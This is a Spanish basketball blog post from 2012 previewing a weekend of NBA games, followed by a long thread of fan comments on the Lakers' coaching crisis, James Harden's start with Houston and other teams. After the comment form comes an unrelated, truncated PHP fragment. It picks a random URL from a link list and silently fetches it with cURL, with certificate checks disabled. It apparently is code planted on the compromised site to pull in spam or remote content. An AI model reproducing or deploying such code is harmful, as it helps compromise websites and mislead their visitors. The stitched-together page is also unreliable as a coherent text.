Fin de semana: ¿Puente? ¿Qué puente?

02 de November de 2012 por MagicJohnson32

Apenas han transcurrido tres días desde el inicio de la regular season, y se nos juntan la fiesta de Todos los Santos con el fin de semana. La gente normal aprovecharía el puente para visitar a la familia, tal vez ordenar el piso, verse las cinco temporadas de The Wire de un tirón o incluso irse unos días de vacaciones. Pero no sois gente normal ¿verdad? Como a estas alturas ya nos conocemos, me atrevería a asegurar que vais a exprimir al máximo la promoción del League Pass. Sirva esta entrada para que os desahoguéis y compartáis vuestras impresiones de lo que vaya sucediendo en la NBA durante el fin de semana, que se presenta apasionante.

Viernes 2

De entre la docena de partidos de la madrugada del viernes al sábado hay unos cuantos que darán que hablar. Cuatro ofrece en directo el Clippers @ Lakers (3h30), con la duda de Steve Nash y todo el morbo del mundo en ver si el vecino (no tan) pobre conseguirá alargar la crisis del vecino rico. El otro gran foco de atención de la noche estará en NY, con la visita de los campeones al Madison Square Garden (1h00). Heat y Knicks se verán las caras por primera vez desde el paseo de LeBron & Co. en los pasados playoffs en un duelo que servirá para medir a los neoyorquinos. También estaremos pendientes del estreno de los Wolves, que reciben a los Kings (1h00), y de si James Harden será capaz de confirmar en Atlanta (00h30) las sensaciones de su espectacular debut como jugador de los Rockets. También se estrenan los Bucks en Boston (00h30), los Magic post Howard ante los Nuggets (00h00) y los Bobcats ante los Pacers (00h00). Completarán la madrugada Bulls @ Cavs (00h30), Jazz @ Hornets (1h00), Blazers @ Thunder (1h00), Pistons @ Suns (3h00) y Grizzlies @ Warriors (3h30).

Sábado 3

El sábado llegará, al fin, el debut de los Brooklyn Nets, que recibirán a los Raptors (00h30). Jugarán también Celtics @ Wizards, Kings @ Pacers (00h00), Nuggets @ Miami (00h30), Blazers @ Rockets y Hornets @ Bulls (1h00), Cavs @ Bucks, Bobcats @ Mavs y Jazz @ Spurs (1h30) y, por último, Warriors @ Clippers (3h30).

Domingo 4

El domingo tendremos una de esas jornadas que tanto nos gusta, con partido matinal incluido: Sixers @ Knicks (17h00). A las 23h00 se disputarán el Suns @ Magic y el Wolves @ Raptors. A medianoche, los Hawks visitan Oklahoma City, y para acabar, un Pistons @ Lakers (2h30).

Comenta

45 comentarios a esta entrada

  1. Denise dice:
    #1

    Ya vereis a partir de hoy como los Magic post Howard no son tan malos pese a la pesima gestión de los GM.
    El Big 3 Davis-Moore-Nelson darán que hablar este año. Aunque esta noche, perderemos contra los todopoderosos Nuggets.

    Si Lakers fuese humillado esta noche ante los vecinos Clippers, ¿creeis que echarán a Mike Brown?

      Citar

  2. MagicJohnson32 dice:
    #2

    No, estoy seguro de que no. Le queda algo de margen.

      Citar

  3. ralage dice:
    #3

    Imposible lo de echar a M.Brown de momento hombre, pensad siempre que estos Heat empezaron 9-8

      Citar

  4. ralage dice:
    #4

    Y Harden liándola otra vez…

      Citar

  5. gabriel dice:
    #5

    Carmelo si que la esta liando pero bien liada, 16 puntos en el primer cuarto
    ha debutado Prigioni,, verle recibir un bloqueo de Kurt Thomas no tiene precio, 75 años suman entre los dos, ya ha estado a punto de hacer uno de sus robos en saque de fondo

      Citar

  6. Esteban dice:
    #6

    Q tal harden?

      Citar

  7. MagicJohnson32 dice:
    #7

    Esteban:
    Q tal harden?

    Un escándalo. Resumen de sus dos partidos como Rocket: 28 de 44 en FG. 20 de 23 FT. 82 puntos. 13 rebotes. 14 asistencias.

      Citar

  8. infante dice:
    #8

    45 puntos el chaval, no son poco ni na!!!

      Citar

  9. MagicJohnson32 dice:
    #9

    Venga, all together: ¡¡Mike Brown dimisión!! (no es que piense que sea culpa suya, al menos no toda, pero ya se sabe…)

      Citar

  10. melo15 dice:
    #10

    Carmeloooooooooo! MVP y amnistia para Stat no lo queremos!

      Citar

  11. Denise dice:
    #11

    Mr. Brown….YOU’RE FIRED!!!!

    Ésas son las palabras mas sabias que Kupchak o Buss podrían decirle a su cara de potato. Este coach es lamentable, pero no de ahora, en Cleveland era un desastre con su Lebronsistema, y muchos ya nos échamos las manos a la cabeza cuando Lakers lo fichó.

    Ayer fue un desastre, una humillación en toda regla ante sus vecinos, Mike Brown impotente sin saber qué hacer, y de los jugadores solo Kobe se salvó; con un Pau esta vez sí, totalmente desubicado jugando a 8 metros; Howard desaparecido; Metta convirtiendose en un bufón cuando intenta un drible o una finta (me harto de reir con él); Blake con la cintura rota y los del banquillo sin aportar mucho. Mención especial para Meeks al que no le dio ni un puñetero minuto. Después ante la ausencia de Nash, a la calamidad de Morris (nefasto jugador) le da un montón de minutos; y en cambio un tio veterano como Duhon lo deja marginado.

    Yo sí creo que Mike Brown es el culpable de todos los males; ya suena D’Antoni, el cual tampoco me gusta, y si va a jugar al run and gun con esta plantilla veterana, pff…
    El mejor candidato para mí sería Stan Van Gundy, aunque sus relaciones con Howard serían un handicap.

    Y sobre los Magic, pues gran debut ante unos Nuggets cuyos jugadores parecen como si no conocieran sus roles todavía muy bien. Davis con su 29-10 apuntando maneras para ser un eterno 20-10 este año y de paso callar bocas …(y todavía hay gente que lo discute).
    Nelson bien, dirigiendo mejor que nunca aunque fallón en el tiro; pero lo veo fino este año. Mal debut de Afflalo pero al menos defiende un huevo. Vucevic tenía dudas de él, pero el poco rato que jugó lo hizo bastante bien, un acierto para quien lo tenga en la Hoops.
    Y sobre todo, E’twaun Moore, pedazo crack en ciernes, sé que es dificil mantener este nivel, si lo hiciese, claro MIP del año. Me ilusiona bastante este jugador.

    Lo negativo, la rotura de mano de Turkoglu, pero bueno, quizás hasta pueda ser positivo porque el turco ya no da mucho de sí.

    Y sobre el resto de la jornada, 3 nombres que callan bocas como presuponía.
    Gortat demostrando que es igual de bueno con o sin Nash.
    Ryan Anderson demostrando que también las enchufa sin Howard.
    Rashard Lewis, que bueno que volviste. Una vez que ha olido el anillo en Miami, vuelve a ser un gran killer.

      Citar

  12. rumbero dice:
    #12

    Al este ritmo la pregunta en Oklahkma será si se tenian que haber quedado con Harden o Durant..jaja Tremendo! Y Lin aprovechando que se desvía el foco de atención.

      Citar

  13. gabrielj dice:
    #13

    es increíble lo de los Lakers, ¿Princeton? ya se olvidaron, ahora toca anarquía total y absoluta en ataque, pero de la mala si los que se toman demasiadas confianzas son gente como Artest
    verle agotar posesiones botando el balón de esa manera tan cómica mientras da ordenes para acabar botandosela en el pie o tirando una piedra debe de ser desolador para los seguidores de los Lakers

    lo de Harden increíble, la facilidad con la que esta anotando y los galones que ha cogido en el equipo en tan poco tiempo dice mucho de el, ademas Lin de momento cumple a la perfección con los focos apuntando a su compañero, me parece un jugador que podrá tener carencias pero no se le puede negar lo “listo” que es para explotar sus virtudes y lo consciente que es de sus limitaciones

      Citar

  14. nba dice:
    #14

    Yo es que tras volver a ver ayer otra vez todos los partidos de los Lakers, pues no se ,
    tras revisar el de Dallas, pense vale es el primera partido , cuesta un poco ajustarse al sistema, supongo que empezaran a defender un poco conforme avance la temporada , se intentara rotar a los jugadores , etc.
    tras revisar el de Blazzers pues veo que Portland, tal como apuntaba no me parece tan mancos, parece que Howard tomo nota y se concentro para mejorar su porcentaje de tiros libre, Kobe no tan egoista, al menos entraban nuevos jugadores en la rotacion, aunque mira ese rookie llamado Lillard que nos ha hecho un traje, tiene pinta de jugon , pos vale derrota aceptada.
    Pero ayer lo de Clippers era , a ver llevamos un año entero con este tio, tenemos a uno de los mejores pivot’s de la Liga, tenemos un 4 que en su carrera ha promediado 18-10 con asiduidad y ha ganado anillos, tenemos tambien a otra cuatro que ha sido All-Star y ha estado antes con este mismo entrenador, tenemos un escolta que es una autentica leyenda de la nba, que sin princeton offense, que si ocho cuartos .
    para que MWP se dedique a botar el balon , por dios, a botar el balon, Artest se debio perder las clases en las que enseñaban la coordinacion necearia para avanzar botando un balon, para que Howard recibe a 3-4 metros del aro, Pau revoloteando a 6-7 metros , aunque defendiendo alguna que otra vez bien a Griffin, a Ebanks que parece que tras todo este tiempo en la liga es incapaz de saber controlarse en las faltas, lo de Howard ya se sabia, pero aun asi Brown empeñado en quemar a todos los titulares, y los suplentes calentando el banquillo que da gusto , para acabar jugando al Kobe-Sistema, pero sin ningun tipo de defensa por dios, si hasta Big Ben Wallace a pesar de sus años es capaz de defender algo, asi no se llega a ningun sitio, en ningun momento del partido dieron la sensacion de que podian darle la vuelta al marcador
    CP3 como siempre haciendonos un traje, ademas Crawdford parecia la reencarnacion de Jordan,
    Yo para esto que echen a Brown y que traigan o a Sloan o a Brian Shaw como comentaban en la retransmision, si hasta los Bobcats, los Bobcats han sido capaces de ganar un partido,.
    Lo de Harden es WOW …

      Citar

  15. Kantonyo dice:
    #15

    Maravilloso inicio de temporada de James Harden, como ha ido mejorando este jugador año a año, ayer contra Hawks demostró un manejo, ritmo y temple con el balón q en los últimos años sólo he visto a Bryant.

    Lebron, Durant y Howard serán muy buenos pero la elegancia con la que juega Harden me recuerda a la decada de los 80. Su forma de jugar a este deporte es exquisita. Vamos a ver cuanto dura este rendimiento.

      Citar

  16. Kantonyo dice:
    #16

    En cuanto a Lakers, en este momento lo más fácil es buscar la culpa en Mike Brown, pero es que a priori no hay mas culpable que él. Con la mejor pareja de interiores de la liga y que no los use ofensivamente es un locura… Ayer entre Pau y Dwight sólo 16 lanzamientos…

    Coincido con Denise en que hay que buscar un juego más pausado y ordenado tanto en ataque como en defensa, no sé si el estilo D’Antoni es el más adecuado, yo me quedaría con Jerry Sloan.

      Citar

  17. Chipi dice:
    #17

    Es que manda narices que teniendo a Pau y DH12, vengan los Clippers y te ganen en el juego interior. Es de traca.

    Y Claver agitando toallas otra vez.

      Citar

  18. nach dice:
    #18

    El problema de D’Antoni es que estos Lakers no pueden jugar Run&Gun, es decir, poder pueden, pero es un suicidio. El paradigma de equipo D’Antoni de correr son los Suns, y mirad a quienes tenían por dentro, que tipos de jugadores, a un Stoudemire que era un finalizador supremo y a un Marion capaz de moverse a una gran velocidad, aparte de a un Diaw capaz de correr pero que colaboraba mucho en temas de rebote.

    Nash y Kobe no tienen ningún problema para jugar Run&Gun. MWP ofensivamente únicamente te va a aportar triples abiertos desde la esquina, no puede botar ni generarse sus propios tiros, no tiene los fundamentos de Diaw y desde luego no tiene la capacidad de finalizar de Marion. Luego por dentro, para jugar a correr veo más a Gasol que a Howard, pero siguen sin ser ninguno de ellos un gran finalizador, Howard puede arrasar con lo que haya en la zona, pero siempre jugando más en estático, y Gasol físicamente no da para ser un finalizador contundente.

      Citar

  19. Esteban dice:
    #19

    estoy emocionado por ver a los rockets hoy y comprobar si esto es racha o no
    lin se ve enormemente beneficiado con otro jugador franquicia al lado, ayer hizo un gran partido y asik puede ser un gortat esta misma temporada

    si mantienen este arranque y con la comodisima situacion salarial que tienen, podrian pensar en reforzarse este año para llegar a PO, podrian asumir el contrato de GRANGER o ZACH, tener a terrence jones y montiejunas y esa capacidad para absorver algun contrato no tan bueno, les permitira reforzarse lo suficiente como pàra soñar con PO

    el trio lin-harden-asik es un muy buen nucleo, y delfino como sexto hombre viene encajando, alguna ayuda y pueden ser peligrosos

      Citar

  20. Esteban dice:
    #20

    apuntes de los juegos de anoche

    pacers regalan un juego frente a los bobcats, en parte por lo que ya dije en el analisis previo, sin una entrella capaz de cerrar los juegos, el tiro del final fue para DJ AUSTIN, el primer partido los salvo el unico que podria asumir ese rol que es HILL, como tambien apunte en su momento
    hibbert, no justifica su estatus all-stasr y su contrato, es un buen pivot, pero no mucho mas que eso

    en cuanto a los bobcats, ya lo debati con sancho88 en su momento, han mejoradoi mucho su equipo en aspectos ofensivos, y su retaguardia no tiene para nada mala pinta, kemba sensacional con 30 puntos, anderson 18, sessions 11 y gordon 10, este año para anotar no tendran los problemas del año pasado

    en el debe, un flojo MKG y un mulles q no confirmo lo que apuntaba en la pretemporada

      Citar

  21. Esteban dice:
    #21

    orlando vencio a denver, fui duramente criticado cuando dije que GLEN DAVIS podria llega al all-star, solo denise me apoyo, bueno anoche termino con 29 puntos y 10 rebotes, y creo que vamos a tener que acostumbrarnos a ver muchos partidos como este de davis

    boston termina de no cerrarme, otra derrota, pero es pronto para enterrarlos, y menos con doc

    los bulls mantienen el ritmo y esperan a ROSE en puestos de PO, para ello muy regulares hamilton y boozer, dos hombres llamdos a ser los encargados de mantener la ofensiva de este equipo responden, tambien le doy mi voto de confianza a nate robinson, que con 16 puntos, en mi opinion puede cumplir parte de la tarea ofensiva que tenia rose

    menphis devuelve a la realidad a los warriors que deben hacerse la idea que entrar a PO sera complicado, procupantes 18 minutos de bogut, buenas noticias la recuperacion de ellis, pero barnes no termina de pesar por el moimento
    en menp`his lo de siempre, pocas sorpresas, buenos partidos de sus 4 espadas ofensivas,y poco mas, mas de lo mismo, un buen equipo y no mucho mas

    los wolves debutan con victoria ante unos muy malos kings, thomas robinson dos puntos y pensar que aqui me han dicho que no se equivocaron en elegirlo por sobre lillard, wolves sin loive y sin rubio aun tienen material

    los hornets sorpreden al jazz, con la confirmacion de que ryan anderson es demasiado bueno para ser suplente, pero sorprendio con 19 puntos lopez, quien lo diria no? partido calladito de davis, no esta tan listo como lillard pareciera

    portland confirma a lillard como candidatazo al ROY, y el thunder se tranquiliza un poco con otro buen partido ofensivo de martin, esta lejos de ser harden, pero el rol de sexto hombre tirador le queda bien

    el resto de los juegos, ya hablaron bastante!

      Citar

  22. Esteban dice:
    #22

    Un muy buen movimiento para los rockets seria glen davis, orlando en reconstruccion aceptaria alguno de tantos jovenes que tienen para ofrecer los rockets, eso si que estaria q ayudaria mucho mucho a harden y compañia

      Citar

  23. Esteban dice:
    #23

    corrigo lo de davis, solo jugo 14 minutos por la conmocion cerebral, nada de partido callado
    y en los warriors en lugar de ellis, quiza poner curry

      Citar

  24. Pikerton64 dice:
    #24

    Bieen, los Wolves empiezan ganando. Lo bueno es que hasta que vuelva Love y luego Ricky el calendario permitirá llegar a Minny con un no tan mal porcentaje, quiero decir, se enfrentan a equipos como Sacramento, Golden State, Toronto o Milwaukee, equipos de su nivel, pues doy por sentadas las derrotas contra Miami o Boston. Kirilenko increíble, Steamer genial, Barea como siempre. Roy, Budinger, Williams fatal. Shved rookie europeo. Pek en segundo plano. Estoy muy ilusionado de como podrán jugar cuando vuelvan las dos estrellas, bueno, la estrella y Love, xdd, es broma. Barea no puede jugar de base porque no la suelta, y eso es insoportable lo haga él o lo haga Kobe, y de dos no porque es muy pequeño. Penetra excelente, tira genial y su teatro nos favorece… pero chupa.
    Del resto (porque mi partido del día cuando jueguen los Wolves serán ellos), decir que brutal Harden, no sé si queriendo reivindicarse o simplemente haciendo su juego. Landry, R. Anderson, J. Crawford presentando su candidatura al sexto hombre. Brandon Rush se pierde la temporada, de modo que mi otra apuesta para el sexto hombre, Jarret Jack, gana muchas papeletas. Por eso creo que el GM de GS lo ha hecho genial, tiene banquillo, rookies con potencial, una gran pareja interior… ¿o no? Sports Illustrated (creo) comenta que el plan de su entrenador es meter a Bogut 20 min/game más o menos hasta Navidades o así para que se vaya acoplando. Y para el Hoops ¿qué pasa con los rookies de Houston? Se comentó de T. Jones que sería muy bueno, al final Machado a DL, y Royce White, cuyos números universitarios me enamoraron, pero ni un minuto para ninguno. Denver perdiendo y ESPN apostando por ellos como segundos del Oeste.
    En cuanto a Lakers… No quiero meterme en su Kobe problema, pero yo diría que el problema es Kobe. Lo sé, al primer jugador al que vi jugar fue a él, con su pelo afro y aquel número 8 y su rap (creo recordar porque yo era muy pequeño) y los anillos, pero es que él… Pasa como con Barea. Si Kobe quisiera su anillo, su sexto para igualar a Jordan en una cifra, debería ser más inteligente y abrir los ojos. Que mire a su alrededor: Pau. Pau. Howard, el Laker del futuro, su reemplazo. Nash, un base legendario, no un Blake. Si fuera más inteligente se daría cuenta de que es bueno, pero no necesariamente tiene que meter 40 por noche para ser la estrella, ya lo ha sido, que mire a Duncan como él ha bajado sus minutos y su salario y no por ello deja de ser el mejor PF de la historia y el más querido por la afición. Debería darle a Nash carta blanca y dejar que el juego se centre en un top 4 jugadores determinantes de la liga, Howard y él relegarse a secundón. Seguramente mejoraría porcentajes (aunque no ha empezado nada mal) y llegarían las victorias. Un equipo con Howard, Kobe y Pau no debería tener problemas, desde luego. Quizás patine, no descubra América u os esté ofendiendo, pero en el partido que yo vi, el de Portland (que buenos son Lillard y Aldrige y que partidazo de Hickson) Nash servía de Chalmers: subir la bola (cuando eso) y en media pista dársela a Kobe. Airballs. Tiros o entradas que no venían a cuento. ¿Cuántos partidos hemos visto perder a los Lakers por una mala selección de tiro de Kobe? Insisto, no digo que sea malo, nunca lo he dicho. Digo que debería cambiar su rol en el equipo. Venga el entrenador que venga, si Kobe quiere seguir siendo el que manda en el equipo nada se puede hacer, podrirá al resto de manzanas.

      Citar

  25. Sancho88 dice:
    #25

    Kings @ Indiana. Confirmadísimo, la NBA ya ha empezado. El pato rosa o el flamenco rosa o lo que sea está de nuevo en las canchas!! Esto arranca!!

      Citar

  26. Sancho88 dice:
    #26

    El señor Marcus Thornton acaba de forzar la segunda prórroga consecutiva con sendos triples en el partido contra los Pacers… a mí me da algo hoy. Este tío no tiene mano, tiene una kalashnikov semi automática para disparar desde fuera. Qué barbaridad…

      Citar

  27. Esteban dice:
    #27

    debut con el pie derecho de los nets, como ya se comento en el analisis, lopez sera all-star esta temporada, no extrañan sus 27 puntos y no extrañara verlo seguidos en esos guarismos, sin dudas es pivot con mejor toque de la nba, y en cuanto engranen mejor los sistemas los nets, machara a todos en el uno contr auno
    gran partido comoe ra de epsrar de watson, e increiblemente gran aporte d blatche, no es una estrella como se quiso hacer creer en su momento pero vaya q puede aportar viniendo de la banca

    con la lesion de wallace, es de esperar q vean algun minuto teletovic y shengeila

    ah, childress no piso pista

      Citar

  28. Esteban dice:
    #28

    se le escapo una victoria casi abrochada a los rockets, mathews empato con un triple y harden cerro pesimamente la ultima bola, para luego perder claramente en suplementario
    los numeros del barba muchos mas terrenales aunque no dejan de ser buenos, 24 puntos aunque 8-22 en cancha, otro partido aceptable de LIN, y la sorpresa para el jugador mas mejorado, omer ASIK se bajo nada menos que 15 rebotes, y venia de bajar nada menos que 19,
    le faltan cosas a los rockets pero con tanto espacio tiene un amplio margen de mejora

    por parte de portland, lo de siempre de aldrige, que a nadie puede sorprender, lo que si es sorprendente es LILLARD, otra vez se fue hasta los 20 puntos, no ha bajado de 20 en sus 3 juegos y ya parece que hace años juega la liga, ni los blazers deben de poder creerlo

      Citar

  29. Esteban dice:
    #29

    los pacers vuelven a la victoria en casa frente a los kings que no conocen la victoria
    en los kings de destacar a cousins con numeros geniales y la ratifiacion de que thorton puede ser candidato a sexto hombre de la temporada (siempre q jamal crawford baje sus prestaciones)

    en los pacers lo de siempre, sus 5 iniciales en gran nivel, incluso gerald green y sobretodo george hill, que promete un temporardon

    un parrafo aparte merece PAUL GEORGE, con 16 puntos, que parecen ser su techo, se lucio principalmente en los rebotes, recordemos que este muchacho salta a la cancha como ESCOLTA y bajo nada menos que 17 REBOTES!!!!!! y hay que recordar que bajo 15 en el partido inicial frente a los raptors, ESTE TIO SE LAS TRAE

      Citar

  30. Esteban dice:
    #30

    Mavs destrozan a los bobcats, noches consecutivas es demasiado para los de jordan
    Darren colison se mantiene en una regularidad asombroza, lo mismo podemos decir de vince carter, sorprendiendo a propios y extraños

    Resaltar dos cosas en los mavs

    OJ Mayo, haciendo lo q se espera de el, 30 puntos, no sera james harden pero de a poco se acomoda a su rol de primer espada
    Y Kaman presentando credenciales en su debut con un 8 de 9 en cancha

    Los mavs no tienen aspiraciones de campeonar a mi entender, pero clasificaran a los PO

      Citar

  31. Sancho88 dice:
    #31

    Los Pacers es un núcleo, un equipo. Poseen una de las mejores defensas de la liga si se ponen, y sobre todo, la dirección de George Hill es soberbia. En este equipo todos han evolucionado, excepto West como es lógico. Hibbert se coloca más cerca de la canasta, se coloca mejor en la defensa y ha ganado músculo, que era lo que todos pedíamos; Hansbrough cada día tiene más cara de lilao, es más agresivo (si es que se podía), y ha mejorado en defensa; George es la leche, como dice Esteban. No le recordaba yo a este tío una mano simiiar, está jugando a grandísimo nivel; Green es la nota disonante, pero bueno, cuando empiece a jugar Granger será el sexto hombre del equipo; incluso, tienen suplente de calidad para Hibbert. Mahinmi lo está bordando en los minutos que juega.

    Los Pacers van a ser de los tres mejores equipos del Este en la regular, yo apostaría que incluso pueden quedar primeros si se lo proponen, y semis de conferencia lo van a hacer seguro, junto a Heat, Boston y Brooklyn

      Citar

  32. nba dice:
    #32

    Sobre Lakers, pues todos tienen responsabilidad aunque Kobe que es el que mas tiempo tiene el balon pues es al que mas parte puede tener, pero no te creas Pikerton que tiene el balon porque para que va a pasarlo si tanto Pau como Howard estan jugando lejos del aro, y pasarsela a MWP , para que, para que nos deleite con su coordinacion en el bote del balon.
    Lo primero los jugadores tienen que jugar en su sitio, realizar rotaciones con cabeza y despues si quereis si no funcionan pues ya se podra dar palos a Kobe

      Citar

  33. rumbero dice:
    #33

    Que arma tan cojonuda va a ser Allen para Miami y más con James como socio. Nos podemos hartar de verlo tirando ‘solo’ desde el triple. Un lujo más para el ataque de los Heat.
    El partido estuvo bonito. Se lo pudieron llevar los Nuggets que estuvieron muy peleones, sobretodo en la pintura, aunque Bosh estuviera soberbio de cara al aro. Luego James mandando y Allen decidiendo. Casi nada

      Citar

  34. nba dice:
    #34

    Sin duda, y despues de ver el boxcore de Miami-Den y compararlo con el de LAkers-Clippers, y ves el total de tiros de los jugadores interiores y llegas a la conclusion o Potato esta cegato o lo otro, pero con lo “sencillo” que es jugar al baloncesto y sobre todo con la calidad de jugadores de la que dispone, haz que se defienda algo, con solo eso ya ganarias los partidos por aplastamiento como hace Miami.
    Es que tal como estan los Lakers, Monroe nos va a hacer un traje en el proximo partido.
    Quiza el boombazo mediatico de Harden este tapando algo mas preocupante quizas, y es que ni Donatas ni Torrence han debutado, los que seguis la NCAA para el draft no considerais que al menos deberian haber disfrutado de algunos minutos, joeer que hasta Claver ha debutado aunque haya sido solo para hacer bulto, habra que ver si se equivoca McHale con eso de subirse solo a la hola de Lin-Harden y seguir manteniendo a Asik aunque no esta acertado de cara al aro

      Citar

  35. Sancho88 dice:
    #35

    Lo de Motiejunas es inexplicable, no me jodas. Enorme en las Summer Leagues, más que aceptable en pretemmporada, y ahora no juega ni un minuto, por detrás de personajes como Craig Smith y Cole Aldrich… es de chiste completemante. En este plan, el entrenador de los Rockets se lo está cargando como jugador de baloncesto.

      Citar

  36. melo15 dice:
    #36

    McHale la esta cagando, no puede tener a Parsons y a Patterson, dos tios normalitos y a Motiejunas y a T-Jones que son el futuro del equipo jugando 0 minutos, esque ni 10 juegan, es muy fuerte ademas que estos rookies se lucieron en la SL y en Pretemporada asi que porque no provarlos? Creo que Mchale se ha visto en PO y ha renunciado a sus Rookies.
    Al igual que Scott Brooks, que no les esta dando minutos a Lamb y a Perry, si no les vas a dar minutos para que les seleccionas??
    El que se esta saliendo es Lillard, vaya chaval! Esque esta haciendo 20pp 7ap es una burrada, ni CP3 se haci estos numeros!
    Por cierto que bien los Knicks no? Felton jugando super bien y Melo bastante bien, deberia pasarla mas pero no esta mal.

      Citar

  37. Esteban dice:
    #37

    es extraño lo de mchale, ciertamentye al menos debio probar tanto a donatas como a terrence, al menos unos minutosa, pero bueno, ambos pueden ser bien usados como moneda de cambio, contanto tambien con otros jovenes como parsons y morris, podrian conseguir la ayuda que necesita harden

      Citar

  38. gabriel dice:
    #38

    Harden anoche empezó muy bien pero a partir del segundo cuarto comenzó a fallar bandejas y tiros libres, cosa rara, tampoco es que forzara mucho los tiros salvo en el ultimo cuarto+prorroga en que se quiso echar el equipo el solo a la espalda y no fue capaz
    lo de Asik de cara al aro es preocupante, un jugador con esa altura cuando agarra un rebote ofensivo la tiene que hundir, mas aun cuando es un negado para meter bandejas y palmeos, ayer falló 3 o 4 de juzgado de guardia

    Aldrich lo que jugó no estuvo nada mal, sobretodo cuando coincidió con Leonard al que no conocía y personalmente me pareció bastante flojo o al menos que esta muy verde, que te toree Howard lo entiendo pero es que Aldrich se le fue fácil varias veces posteando

      Citar

  39. Esteban dice:
    #39

    gabriel: yer falló 3 o 4 de juzgado de guardia

    bueno si bien es cierto que asik no ayuda en ofensiva, creo que con 15 rebotes maquilla cualquier defecto

      Citar

  40. gabriel dice:
    #40

    Esteban: bueno si bien es cierto que asik no ayuda en ofensiva, creo que con 15 rebotes maquilla cualquier defecto

    estoy deacuerdo pero varios de sus rebotes ofensivos terminan con tiros que no estan ni cerca de acabar en canasta, si puliera eso seria un jugador mucho mas importante

      Citar

  41. rumbero dice:
    #41

    El problema de este hombre es el contrato que tiene. Para cuando cobre los 15 millones en su tercer año ya debería haber aprendido un par de movimientos, por mucho que su rol no sea el de aportar ofensivamente.

    Y los Knicks que vuelven a ganar. Muy fino ha empezado Melo y el equipo en general. Yo creo que les viene bien lo de Stoudemire la verdad. Y a los Sixers sin Bynum no les llega para tanto. Lo peor la lesión de J.Richardson justo al principio del partido, se ha doblado el tobillo con un cámara que estaba sentado (le ha hecho la de Bowen)

      Citar

  42. Esteban dice:
    #42

    so victoria de los KNICKS, soy sincero, siento debilidad por el equipo que han armado y la profunidad del mismo, sin amare, shumpert y camby, ganan dos juegos con una amplia ventaja y mostrandose muy bien

    jason kidd en dos juegos se ha encargado de elimar las dudas de su edad, lo propio ha hecho kurt thomas dando su aporte de rol de buena manera, y en cierta forma tambien prigioni,
    entre los viejos, solo falta que juegue camby que para mi es el mejor del cuarteto de veteranos

    novak sigue ganandose cada dolar con triples y brewqer respondiendo como era de esperar, algun tiro abierto, defensa y generosidad con sus compañeros
    felton sin ser nada de otro mundo, demuestra que puede jugar y J.R. SMITH explota a voluntad su rol de sexto hombre anotador

    lo de melo, merece un parrafo aparte, sin amare volvio a ser el jugador de denver, capaz de liderar a un equipo de modo soberbio

    habra que ver que ofrecen los nets, pero veo a los knicks como segundos del este

      Citar

  43. HisRoyalAirness dice:
    #43

    Esteban:
    so victoria de los KNICKS, soy sincero, siento debilidad por el equipo que han armado y la profunidad del mismo, sin amare, shumpert y camby, ganan dos juegos con una amplia ventaja y mostrandose muy bien

    jason kidd en dos juegos se ha encargado de elimar las dudas de su edad, lo propio ha hecho kurt thomas dando su aporte de rol de buena manera, y en cierta forma tambien prigioni,
    entre los viejos, solo falta que juegue camby que para mi es el mejor del cuarteto de veteranos

    novak sigue ganandose cada dolar con triples y brewqer respondiendo como era de esperar, algun tiro abierto, defensa y generosidad con sus compañeros
    felton sin ser nada de otro mundo, demuestra que puede jugar y J.R. SMITH explota a voluntad su rol de sexto hombre anotador

    lo de melo, merece un parrafo aparte, sin amare volvio a ser el jugador de denver, capaz de liderar a un equipo de modo soberbio

    habra que ver que ofrecen los nets, pero veo a los knicks como segundos del este

    Esteban creo que nadie dudaba de lo que podía ofrecer Kidd SANO. Tú lo has dicho, van 2 partidos

      Citar

  44. Esteban dice:
    #44

    Bueno, mas alla de la edad, kidd no es jugador que historicamente se pierda muchos juegos, y en todo caso, estan prigioni y felton q no lo vienen haciendo mal

      Citar

  45. GreenPride dice:
    #45

    Sinceramente sobre los Knicks han empezado muy bien pero es demasiado pronto para lanzar las campanas al vuelo y más con los veteranos que pueblan el equipo. Veremos si las lesiones les respetan y si esa tendencia a la autodestrucción que suelen tener no les acaba pasando factura. Yo sigo sin verles más allá del 4º puesto del Este y en PO fuera en primera o segunda ronda pero queda muuucho para ver como acaba esto (espero un bajón claro con la vuelta de Amare)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>